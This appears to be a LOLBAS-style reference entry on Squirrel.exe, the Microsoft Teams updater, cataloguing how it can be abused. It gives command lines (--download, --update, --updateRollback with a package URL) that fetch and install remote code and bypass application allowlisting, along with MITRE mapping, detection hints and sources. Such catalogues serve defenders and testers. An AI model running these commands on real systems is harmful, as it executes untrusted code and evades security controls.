.. / Squirrel.exe
Star

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.


Paths:


Resources:
https://www.youtube.com/watch?v=rOP3hnkj7ls
https://twitter.com/reegun21/status/1144182772623269889
http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

Acknowledgement:
Reegun J (OCBC Bank) - @reegun21
Adam - @Hexacorn


Detection:
Update.exe spawned an unknown process



Download

The above binary will go to url and look for RELEASES file and download the nuget package. 
squirrel.exe --download [url to package]
Usecase:Download binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



AWL bypass

The above binary will go to url and look for RELEASES file, download and install the nuget package. 
squirrel.exe --update [url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package. 
squirrel.exe --updateRoolback=[url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



Execute

The above binary will go to url and look for RELEASES file, download and install the nuget package. 
squirrel.exe --update [url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package. 
squirrel.exe --updateRollback=[url to package]
Usecase:Download and execute binary
Privileges required:User
OS:Windows 7 and up with Microsoft Teams installed
Mitre:T1218